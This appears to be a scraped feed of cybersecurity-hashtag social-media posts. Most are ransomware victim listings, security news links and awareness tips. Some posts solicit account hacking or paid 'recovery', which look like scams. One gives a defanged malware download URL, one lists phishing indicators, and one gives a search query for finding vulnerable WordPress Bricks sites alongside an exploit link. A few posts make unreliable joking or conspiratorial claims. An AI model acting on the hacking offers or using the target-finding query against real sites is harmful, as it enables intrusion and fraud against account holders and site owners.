Hunters International Ransomware Victim: Alupar Investimento SA - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Crystal Lake Health Center - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Communication Federal Credit Union - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Innovative Automation - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Charles Trent - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Gallup McKinley County Schools - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Benchmark Management Group - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Ausa - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Bradford Health - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Nastech - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Thorite Group - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Medjet - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Deegenbergklinik - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Sindicato de Enfermería (SATSE) - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Lancaster County Sheriff's Office - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: InstantWhip - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
The stats speak for themselves.Without accurate, real-time #data, you risk poor #citizen experiences, non-compliance, and inadequate #cybersecurity.Here's how to get ahead ➡️ agilesolutions.co.uk/the-5-m… -- AgileIM
Using AI to develop enhanced cybersecurity measures bit.ly/3I2POlU#infosec #cibersecurity #ciberseguridad #cyberattack #hacking #privacy #threat #malware #ransomware #phishing #spyware #tech #technology -- CioAmaro
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagram #hackedwallet -- cyberTeam_INC
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagram #hackedwallet -- cyberTeam_INC
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagram #hackedwallet -- cyberTeam_INC
The Invisible Threat of Deepfake Phishing buff.ly/3MLeceE #EmergingTech #Cybersecurity #CyberCrime #Deepfake #Phishing #Technology #CISO #Smishing #Cyber #Hacker #Ransomware #Malware #AI #Coruzant #InclusionCloud #CTO @InclusionCloud -- DivergentCIO
Another day, a new phishing scam. This week, we’ve been made aware of a new type of phishing scam specifically targeting domain customers of IONOS. Find out more from our blog: fifteendesign.co.uk/blog/the…#marketing #developers #webdevelopers #IONOS #phi -- FifteenAgency
The solar flare took out cell phones at 2:22:24 am on 2/22/24.Weird how that works. #attoutage #ATT #Verizon #TMobile #outage #CyberSecurity -- FredFiniteFarm
Phishing Inception: #Cybercriminals have been targeting #ESP through recursive credential attacks, exploiting #mailing tools to send #Phishing emails.Full story👇kaspersky.com/blog/sendgrid-… -- kaspersky
I was just awarded the Loyal Leader badge on HTB Academy! academy.hackthebox.com/achie… #hackthebox #htbacademy #cybersecurity -- Noob73286788366
Snapchat is the easiest app to get hacked ,text me now if you want to get any Snapchat account hacked #hacked #snapchat #snapchatdown #snapchatleak #hackaccount #hackinginquiry #phishing #hacker #hacked -- TechVishnu2
Snapchat is the easiest app to get hacked ,text me now if you want to get any Snapchat account hacked #hacked #snapchat #snapchatdown #snapchatleak #hackaccount #hackinginquiry #phishing #hacker #hacked -- TechVishnu2
🛡️ Avast: Up to 70% Off Top-Rated Protection! #wordlnewads #CyberSecurity #OnlineSafety #SecureYourWorld #CyberSecurity #antivirus #securitysoftware #dataprotection #smallbusiness #HomeOffice #phishing #malware #ransomware #vpn #LimitedTimeOffer 👇👇👇jdoqoc -- worldnewads
ALERT⚠️@IndianCERT has reported multiple vulnerabilities in Google Chrome that could allow a remote attacker to execute arbitrary code on the targeted system.Learn more at cert-in.org.in/#cybersecurity #DigitalIndia #Chrome -- GoI_MeitY
CVE-2021-30551 (Type confusion in V8 in Google Chrome) cwresearchlab.co.kr/entry/CV… #Pentesting #Bypass #CyberSecurity #Infosec -- ptracesecurity
🔒 Cybersecurity is not a one-time investment; it's a continuous process. Stay vigilant, stay secure. #CyberAware #CyberSecurity -- amrit_twts_
🎉📣#CSW2024 hits a record with 138 events registered so far! Thanks to all for boosting #cybersecurity awareness in Scotland 🏴 Join us & make an impact ➡️ cyberscotland.com/cyberscotl…@CyberResScot#CyberScotland -- CyberScotlandWk
Cyber Security Ecosystem#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips -- hackinarticles
Ransomware Operators Continue to Exploit Citrix Bleed Vulnerability#Patching can be difficult and often takes time, but there is no excuse for orgs to be unaware of a patchable #vulnerability...bit.ly/4bypihJ#cybersecurity #infosec #security #ransomware -- HalcyonAi
#ICYMI @Gartner_inc Identifies the Top #Cybersecurity Trends for 2024 t.ly/RCj62 via @NCN #infosec #IAM #CTEM #GenerativeAI #CxO #CISO -- jc_vazquez
Versa Networks unveils SASE on SIM to revolutionise mobile network security noah-news.com/gb/en/technolo… #mobilenetworks #cybersecurity #innovation -- JIsaias_Noah
In our latest blog post, we take a look at how being fully remote can impact your SOC 2 compliance process and what you can do to make the process easier.itjones.com/blogs/how-does-b…#compliance #soc2 #infosec #security -- jonesit_sf
#Cybersecurity professionals will soon be able to use Generative #AI to predict attacks. This is a huge milestone we're coming up on, and it was made possible through quality data and better-tuned models. @FortuneMagazine #Data fortune.com/2024/02/07/ai-c -- MattLitchfield_
La GenAI Gemini de Google prise au piège de la diversitélemondeinformatique.fr/actua…#Infosec #Security #Cybersecurity #CeptBiro #GenAI #Gemini #Google -- ReneRobichaud
Fin d'Azure IoT Central : Microsoft rétropédalelemondeinformatique.fr/actua…#Infosec #Security #Cybersecurity #CeptBiro #AzureIoTCentral #Microsoft -- ReneRobichaud
Une curieuse fuite révèle qu’un organe d’espionnage chinois a ciblé des Françaisnumerama.com/cyberguerre/163…#Infosec #Security #Cybersecurity #CeptBiro #Fuite #Espionnage #Chinois #Francais -- ReneRobichaud
#cybersecurity #analytics #ai #lot #python #rstats #tensorflow #reactjs #CloudComputing #Serverless #Datascientist #Linux #100daysofcode #nodejs #telegram #lote #bitcoinde teléfono #hackeado #hackaccount ##hackedforfun #hackingsnapchat -- willamson477
⚠️⚠️ CVE-2024-25600 Unauthenticated Remote Code Execution –WordPress Bricks <= 1.9.6 CVSS 9.8FOFA Query: body="/wp-content/themes/bricks/"Link🔗: en.fofa.info/result?qbase64=…Poc: github.com/Chocapikk/CVE-202…#CyberSecurity #OSINT #FOFA #infosecurity -- fofabot
Detection Rules Development Framework ipurple.team/2024/02/21/dete… #Pentesting #CyberSecurity #infosec -- ptracesecurity
Managed IT Services - Products & Services#manageditservices #itservices #cybersecurity #technology #itsupport #itsolutions #managedit #msp #managedserviceprovider #tech #informationtechnology #technologies #Products #Services -- SMARTCHOICEJM
Looks like some pro-Russian hacktivists have promoted me to a Western Intelligence Agency. 🤔🤔🙃🙃🤪🤪(Note that the list is not ranked in order)#cybersecurity #infosec #cybertracker -- Cyberknow20
What impact will the #NIS2 directive have on companies in the EU? And how will @siemensindustry support customers in this field of #cybersecurity? The answer gave Stefan Woronka from #Siemens in our video.[sponsored] @Siemens #automation #IIoT #IoT -- DirkSchaar
Red teams, the ethical hackers of #cybersecurity, meticulously examine organizational defenses to expose vulnerabilities. They provide a comprehensive evaluation of how prepared organizations are against #cyberthreats. Learn How: eprotect360.com/cyber-sec -- e_protect360
We give patches instead of roses to celebrate February 2024’s Patch Tuesday. This month has 73 total CVEs: five are critical and two were publicly exploited. Learn more. @Akamai #cybersecurity bit.ly/42OkYqE -- epichol
#CyberAttack Alert 🚨🇺🇸 #USA: Hardeman County Community Health Center reportedly compromised by ALPHV/BlackCat #ransomware group.Hardeman County Community Health Center (hardemanhealth.org) has been added to the ALPHV/BlackCat ransomware group's data leak -- H4ckManac
Mtandao ni fursa ya ELIMU , chagua FURSA.#usalamamtandaoni #cybersafety #cybersecurity #tcratz #elimu #mtandaonifursabakisalama 📹:TCRA -- Hakingowi
cloudwithease.com/how-cloud-…#cloud #cloudcomputing #CloudTechnology #cloudwithease #CloudSecurity #cybersecurity #cloudservices #cloudengineer #networkengineer #SecurityExperts #cybersecurityexpert -- ipwithease
#cybersecurity needs to keep evolving with the risks and new regulations eg DORA, Digital Operational Resilience ActWith @Commvault and @oracle -- jenstirrup
Don’t forget the #cybersecurity basics! With @Oracle and @Commvault#LeaveChaosbehind -- jenstirrup
Explore the future of artificial intelligence with this comprehensive guide to the top 12 AI trends and predictions for 2024. bit.ly/4bJqij8#ArtificialIntelligence #microservices #GenerativeAI #MachineLearning #QuantumAI #cybersecurity -- mayurrajput1995
📢 NEWS: We are excited to work with @WelshGovernment & @SwanseaUni in a new groundbreaking Smart Partnership to improve cyber resilience in Welsh SME’sMore ➡️ purecyber.com/news-1/purecyb…#cyber #cybersecurity #smartpartnership #wales -- PureCyberLtd
Look at this great #infographic with the the synergy between #ArtificialIntelligence, #MachineLearning in times of #GenerativeAI#DigitalTransformation #BigData #AI #cybersecurity #Blockchain #Analytics #Industry40 #IIoT #DataScience #IoT #ChatGPT -- R_Demidchuk
#CyBoK at #WomenInCyberUnderstanding skills and qualifications in #cybersecurity is not an easy task, but help and support is here -- YCherdantseva
Ken Sheehan from @smarttech247 at #TechHealth24 reflecting on changes to #infosecurity since the May 2021 cyber attack...#CyberSecurity -- ADODonoghue
iMessage: Apple aggiorna la crittografia con il protocollo PQ3#Aggiornamenti #Appl3 #Comunicazione #Crittografia #CyberSecurity #Hacking #iMessage #iOS174 #iPadOS174 #macOS144 #Messaggistica #Notizie #PQ3 #Privacy #Sicurezza #watchOS104ceotech.it/imessage -- CeotechI
#threathunting #cybersecurity #threatinteldecoded.avast.io/threatresea… -- CyberShieldCom
🔉 CrowdStrike has released its annual threat report on the latest trends and insights. It highlights the rise of stealthy and sophisticated attacks exploiting cloud & supply chain vulnerabilities, and leverage generative AI & valid credentials. #ctibuff.l -- gossy_84
Buscas un master en #CTI pues en @kschoolcom tienes la primera formación sobre la disciplina en español.+info: estudiar.kschool.com/cyber-t…✅ Inicio 23 de abril✅ Modalidad 100% práctica✅ Hasta el 4 de marzo 25% de descuento✅ Profesores referentes#Ciberint -- ivanPorMor
Avoid OTP Fraud!Protect your personal information and do not share it with anyone.Stay vigilant stay safe.OTP ਧੋਖਾਧੜੀ ਤੋਂ ਬਚੋ!ਆਪਣੇ ਨਿੱਜੀ ਜਾਣਕਾਰੀ ਦੀ ਰੱਖਿਆ ਕਰੋ, ਇਸ ਨੂੰ ਕਿਸੇ ਨਾਲ ਸਾਂਝਾ ਨਾ ਕਰੋ।ਸੁਚੇਤ ਰਹੋ ਸੁਰੱਖਿਆ ਰਹੋ !#Cybersecurity#Cyberawareness#BeCyberSmart -- PP_Gurdaspur
Great post that shows how Russian-speaking cybercrime forums work from an economic perspective and what challenges admins of such forums have to deal with🕵️‍♂️​cybercrimediaries.com/post/r…#infosec #cybersecurity #malware #ransomware #threatintel -- r1cksec
Hunters International Ransomware Victim: Lancaster County Sheriff's Office - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: InstantWhip - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Avianor Aircraft - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Builders Hardware and Hollow Metal, Inc[.] - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Alupar Investimento SA - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Crystal Lake Health Center - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Communication Federal Credit Union - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Innovative Automation - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Charles Trent - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Gallup McKinley County Schools - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Tiete Automobile - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: SOPEM - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: United Africa Group Ltd[.] - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Medjet - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Sindicato de Enfermería (SATSE) - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
🔆BEAUTIFULLY FINISHED SERVICED 4 BED SEMI DETACHED DUPLEX🔆LOCATION:📍THOMAS ESTATE , AJAHPRICE: 75mATINUKE ☎️ 08072005809Check the comment section for more pictures#Cybersecurity #NigeriaProtest -- ShelterForYou_
Uncover the intricate web of ransomware delivery methods! From #phishing emails to RDP attacks, explore 7 common pathways to system infiltration: buff.ly/3SL9ZcU #Ransomware #Cybersecurity -- StoneFlyInc
Explore #Conti #ransomware – the group behind #cyberattacks on Exagrid and the Costa Rican government. Our latest glossary entry offers insights into Conti's tactics and essential mitigation strategies. Read more: buff.ly/48qMTOG#Cybersecurity #Ransomware -- StoneFlyInc
Yesterday's REX Wire updatesYour daily briefing of some of the most important stories from the #crypto, #finance, and #tech space.Stay ahead with our comprehensive coverage. 👇---#Cybersecurity 101: PhishingOriginating in the mid-1990s, #phishing tricks in -- _REXWire
Interesting reading on reversing a custom Instruction Set Architecture (ISA) using Binary Ninja (37C3 CTF)Credits Thomas Imbert (@Synacktiv)synacktiv.com/en/publication…#cybersecurity #reverseengineering #binaryninja -- 0xor0ne
#India proposes these steps for a global crackdown on #phishing- cnbctv18.com/technology/indi…@Djay_Khatri -- CNBCTV18Live
¿Sabías que el uso de Kubernetes pone en peligro la seguridad de tu compañía?Sí, sí, como lo lees.Por eso te traigo un contenido en el que verás las tres formas más usuales.👇👇👇cybersec.xmcyber.com/s/using…#Kubernetes #cybersecurity #cybersecurityawareness -- comercialciber
🚀 Excited for tomorrow! CyBOK is heading to @WomenCyberWales' 'Securing the Future: Women in Cyber' at @ICCWales. A day to celebrate women's talent in cyber security!See you there, @UKC3, @UKCyberCouncil, & @thecyberscheme @CompTIA#cybersecurity #womenin -- cy_bok
Auch wenn #Phishing-Angriffe durch die Nutzung von KI-Tools immer schwieriger zu erkennen sind, gibt es nach wie vor ein paar Warnsignale, auf die Sie bei Ihren Mails achten können.Mehr zum Schutz vor Phishing-E-Mails erfahren Sie in unserem Blog:cyberead -- CybeReadyDACH
#threathunting #cybersecurity #threatinteltrendmicro.com/en_us/researc… -- CyberShieldCom
#threathunting #cybersecurity #threatintelthehackernews.com/2024/02/mu… -- CyberShieldCom
#threathunting #cybersecurity #threatintelany.run/cybersecurity-blog//… -- CyberShieldCom
#threathunting #cybersecurity #threatintelthehackernews.com/2024/02/us… -- CyberShieldCom
Attention Android and Linux users! Stay alert as new Wi-Fi flaws put your devices at risk of cyber attacks. Beware of shady networks and data thieves lurking in the digital shadows. Secure yourself now! #CyberSecurity #StaySafe" thehackernews.com/2024/02/ -- DailyDecryptPod
🔐 Wondering how cyber secure connectivity networks in the EU are?📡 Today’s published #cybersecurity report identified threats that pose a significant risk for the security & resilience of #connectivity infrastructure.⤵️ Read more on the recommendations fo -- DigitalEU
उत्कृष्टता संस्थान भोपाल में साइबर सखी प्रशिक्षण कार्यक्रम का शुभारंभ माननीय मंत्री जी, महिला एवं बाल विकास विभाग @NirmalaBhuria ने किया.mpinfo.org/Home/TodaysNews?n…@CMMadhyaPradesh@JansamparkMP#JansamparkMP #childprotection #CyberSecurity -- dwcdmp
la bandeja de entrada de Snapchat pirateada ahora para obtener una guía sobre cómo recuperar tu cuenta #Hacking #snapchatdown #5g #icloud #snapchatleaked #phishing #phish #phish #hackedgmail #hackedinstagram Si tu cuenta está pirateada, o tu cuenta está s -- Ethicalhacker62
ahora DM restaura todas las cuentas sociales y personales. #gmailhack #hackeado #hacking #hackaccount #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #hacked #missingphone #phishing #phish #hackedgmail #hackeed #hack -- Ethicalhacker62
BianLian #ransomware group has added 2 new victims to their #darkweb portal. -March Construction-Human Resources Technologies, Inc #USA#BianLian #cyberattack #cti #databreach #threatintel -- FalconFeedsio
Safety tip of the day: Beware of credit card frauds.#indiancert #cyberswachhtakendra #staysafeonline #cybersecurity #G20India #g20dewg#besafe #staysafe #mygov #Meity#onlinefraud #cybercrime #scam #cyberalert #CSK #cybersecurityawareness -- IndianCERT
Wyze webcam Flaw let strangers see into some users’ homes  CybersecurityNews dlvr.it/T357m7 #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
Ça va la #CTI League et le Framework #Disarm ? Vous touchez des sous du Pentagone ou d'une autre instance liée à l'OTAN?On vous a vu!C'est de la trahison contre notre pays et la Démocratie #MikeBenz @TuckerCarlson -- Moulin080743
Pentesting Fundamentals - I have just completed this room! Check it out: tryhackme.com/room/pentestin… #tryhackme #cybersecurity #framework #penetrationtesting #ethics #standards #review #OSSTM #OWASP #NIST #NCSC #NCSCCAF #ROE #scope #pentestingfundament -- MusinguzOscar
২০২২ সালে ১২৭টি দেশে ৩৭টি এআই-সম্পর্কিত আইন পাস করা হয়েছে। বিশেষজ্ঞ- বিবেক মিশ্র & পঙ্কজ ফানাসে # US #Biden #AI #cybersecurity #regulation tinyurl.com/3cu55jvj -- orfbangla
wired.com/story/cybersecurit… #socialmedia #platforms #digitalmarkerting #media #deepfakes #misinformation #cybersecurity #hackers #ransomware #phishing #attacks #spyware #cybersecurity #marginalized #communities #problem -- oyevengatedigo
New Ssh Snake Malware Steals Ssh Keys To Spread Across The Network - redpacketsecurity.com/new-ss……#OSINT #ThreatIntel #CyberSecurity redpacketsecurity.com/new-ss… -- PranayChatter11
Us Offers 15 Million Bounty For Info On Lockbit Ransomware Gang - redpacketsecurity.com/us-off…#OSINT #ThreatIntel #CyberSecurity -- RedPacketSec
Screenconnect Critical Bug Now Under Attack As Exploit Code Emerges - redpacketsecurity.com/screen…#OSINT #ThreatIntel #CyberSecurity -- RedPacketSec
New Ssh Snake Malware Steals Ssh Keys To Spread Across The Network - redpacketsecurity.com/new-ss…#OSINT #ThreatIntel #CyberSecurity -- RedPacketSec
BianLian Ransomware Victim: Marchassociates - redpacketsecurity.com/bianli…#BianLian, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Orbus Visual Communications: Sicherheitsvorfall #Datendiebstahl #Phishing #infosec #TeamInfoSec #cyberangriff security-incidents.de/sicher… -- SecIncidents
Family and Children’s Services of Lanark, Leeds and Grenville: Sicherheitsvorfall #Einbruch #Datendiebstahl #infosec #TeamInfoSec #cyberangriff security-incidents.de/sicher… -- SecIncidents
Deepfake #Phishing Grew by 3,000% in 2023 — And It's Just Beginning | HackerNoon hackernoon.com/deepfake-phis… -- StanleyEpstein
The @intigriti Feb CTF challenge by @GoatSniff was a blast 💖 Check out my write-up for an in-depth look and a live demo where I transform it into an automated Python exploit 🐍 #CTF #CyberSecurity #infosecuritysec.stealthcopter.com/intigr… -- stealthcopter
#Online #gujaratpolice #CyberSecurity #Gujarat@sanghaviharsh@GujaratPolice -- abtakmediahouse
New SSH-Snake malware steals SSH keys to spread across the network! bleepingcomputer.com/news/se…#SSH #network #networksecurity #RCE #ZeroTrust #ZeroDay #cybercrime #hacker #privacy #APT #bot #CISO #DDoS #hacking #phishing #CyberAttack #cybersecurity #Sec -- bamitav
US offers $15 million bounty for info on #LockBit #ransomware gang! bleepingcomputer.com/news/se…#bounty #RCE #ZeroTrust #ZeroDay #cybercrime #hacker #privacy #APT #bot #CISO #DDoS #hacking #phishing #CyberAttack #cybersecurity #Security #infosec #AppSec -- bamitav
#EPFO data breached in 2018 ‘repackaged’ by Chinese cyber agency, probe findsindianexpress.com/article/bu…#hackerinchina #Chinese #DataSecurity #DataPrivacy #RCE #ZeroTrust #ZeroDay #cybercrime #hacker #privacy #APT #bot #CISO #DDoS #hacking #phishing #Cy -- bamitav
सभी iPhone उपयोगकर्ताओं के लिए अलर्ट! 📢 नकली ट्रेडिंग एप्लिकेशन से सतर्क रहें जो संभावित रूप से आपकी गोपनीयता और सुरक्षा को नुकसान पहुंचा सकते हैं।#I4C #MHA #Cyberdost #Cybercrime #Cybersecurity #Stayalert #News #Awareness -- Cyberdost
National Security Agency announces retirement of #Cybersecurity Director.The National Security Agency (@NSAGov) announces the retirement of Rob Joyce, the Director of Cybersecurity and the Deputy National Manager, National Security Systems; effective Marc -- ExtremaRatio4
How #AI empowers #cybersecurity defenders from #hackers.Eoin Hinchy, CEO of Tines, dispels fears of AI-fueled cyberattacks, highlighting its greater benefits for security teams. In cybersecurity, the rise of artificial intelligence has sparked fears of an -- ExtremaRatio4
Learn on the go with ISC2 GRC Skill-Builders! Fast, on-demand learning. Ready to boost your skills? Find out more: ow.ly/Ph0K50QC5Mm#Cybersecurity #GRC #GRCSkillBuilders -- ISC2
New Cyber Security Risk for Bankunited – What's the Latest? - TipRanks.com  TipRanks dlvr.it/T34xN9 #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
⚠️ Millions of #Android, #Linux, and ChromeOS devices are vulnerable new Wi-Fi attacks! Hackers can steal data or spy on you.Details here: thehackernews.com/2024/02/ne…No patch yet, manually configure CA certificates for protection.#cybersecurity #hacking -- TheHackersNews
Beware! Be vigilant against Money Mule Scams. Being alert is the key to breaking the scam chain!#MoneyMule #financialsafety #SafeBanking #CyberSecurity #Utkarshsmallfinancebank #BFSI -- Utkarshsfbl
How to prevent your WordPress site from becoming a hacker's target?webdesignerdepot.com/rock-so…#CyberSecurity #websecurity #dataprotection #cyberthreats #digitalsecurity #SafeOnline #wordpresssecurity2024 #webbirds #USA -- webbirdsus
#phishing #Izly 198.23.62.188 (US)🇺🇸 AS32748 - STEADFAST s://bonizlyfr.com/zly/ VIA s://univ-izly.commoncentscompanies.net/ ping @ANSSI_FR @malwrhunterteam -- yvesago
A Natto Thoughts report from October last year described i-SOON as one of many Chengdu-based #cybersecurity companies that work as contractors for the #Chinese government, providing the technical know-how and manpower for internal surveillance operations -- 5tuxnet
Musk’s X withholds accounts, tweets in India to obey orders: ift.tt/i3xVOXt by TechCrunch #infosec #cybersecurity #technology #news -- Alevskey
uhmmm... undetectable? #elf #malware0 detectionshxxp://194.48.250.71/http_storm46d463a3ddd35d9b96d5e5d106a847a7fc986a3ebce58e5eca93d4264fd874a9http_storm no wonder why their telegram group has 4.5k is pretty huge botnet... -- banthisguy9349
Dm me for easy ways to recover your lost logging details. #email #passcode #walletphrase #recoveryphrase #facebook #twitter #hacked #icloud #facebookdown #imessage #ransomware #snapchat #snapchatsupport #snapchatleak #hacking #discord #XboxSeriesX -- CaudleLina72127
Have exclusive Hacking jobs?DM and Ask for my service.#hacked #icloud #facebookdown #imessage #ransomware #snapchat #snapchatsupport #snapchatleak #hacking #discord #XboxSeriesX #XboxShare #roblox -- CaudleLina72127
El 📧 es de los principales vectores para propagar malware ☢️☣️ #phishing 🎣 #ciberseguridad #CyberSecurity -- CiberneticaChis
Transmission of Sensitive Data Policy techrepublic.com/resource-li… #Cybersecurity #technology -- ClintechSystems
8 strange ways employees can (accidently) expose data🧨bit.ly/3M633Dj#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- HackerOne0x02
#Info sec #CyberSecurity #Hacking #cyber #info security #arduinolove #Arduino #cyberattack #Linux #MachineLearning #DataAnalytics #snapchatdown #100DaysOfCode #100daysofcodechallenge #Python #javascript #AI #webdevelopment #twitter #ETH -- HackerOne0x02
Is mandatory password expiration helping or hurting your password security?🧨bit.ly/3UZnwhl#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- HackerOne0x02
Researchers warn high-risk ConnectWise flaw under attack is ’embarrassingly easy’ to exploit dlvr.it/T34nZK #Security #connectwise #cybersecurity #hacking -- igor_os777
8 strange ways employees can (accidently) expose data🧨bit.ly/3M633Dj#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- louis_hack1
Is mandatory password expiration helping or hurting your password security?🧨bit.ly/3UZnwhl#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- louis_hack1
.@CrowdStrike SVP of Counter Adversary Operations @Adam_Cyber unpacks top #cybersecurity trends in this blog about the 10th edition of the CrowdStrike 2024 Global Threat Report. crowdstrike.com/blog/crowdst… -- PatilMrunmayi1
Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware #T -- REUBEND81186693
If you need Help recovering any Account, Mails, Tiktok, Snapchat, Instagram etc.I'm available for assistance#hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #ransomware #alterworld#hacked. -- REUBEND81186693
me for all account retrievals.Recover locked/lost accounts with ease. #gmailhack #gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware #NFTs #crypto -- REUBEND81186693
#News #Citrix #cloud #cybersecurity #report Cybersecurity fears drive a return to on-premise infrastructure from cloud computing helpnetsecurity.com/2024/02/… -- TheCyberSecHub
Some important news about bad actors and other #cybersecurity threats from @SonicWall and @CrowdStrike. bit.ly/4bIFLjx -- Craig_Galbraith
8 strange ways emproyees can (accidently) expose data#DataSecurity #Privacy#100DaysOfCode#CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked#Infosec!! -- cybersecurity58
#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- HackerOne0x02
#CyberSecurity -- LeandroLei88186
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: CISA Releases Seventeen Industrial Control Systems Advisories - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
CISA: CISA Releases Three Industrial Control Systems Advisories - redpacketsecurity.com/cisa-c…#CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
